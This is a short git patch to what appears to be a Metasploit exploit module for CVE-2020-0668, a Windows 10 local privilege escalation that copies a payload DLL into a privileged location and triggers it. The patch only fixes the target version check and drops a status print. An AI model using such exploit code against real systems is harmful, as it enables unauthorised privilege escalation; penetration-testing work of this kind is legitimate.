From 48ed31f32349443a3a9538fa4f011b085e9d32fa Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 12 Dec 2024 17:11:53 -0600 Subject: [PATCH] Fix version check --- .../exploits/windows/local/cve_2020_0668_service_tracing.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb index 629d097e29fd..a2ab61079da6 100644 --- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb +++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb @@ -261,7 +261,6 @@ def exploit # start file copy rastapi_privileged_filecopy(payload_dll, exploit_dir, upload_payload_pathname, target_payload_pathname) - # launch trigger launch_dll_trigger print_warning("Manual cleanup after reboot required for #{target_payload_pathname} and #{exploit_dir}") @@ -285,8 +284,7 @@ def validate_target end version_info = get_version_info - vprint_status("Version: #{version_info.number}") - unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909) + unless version_info.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909) fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17134-18363') end end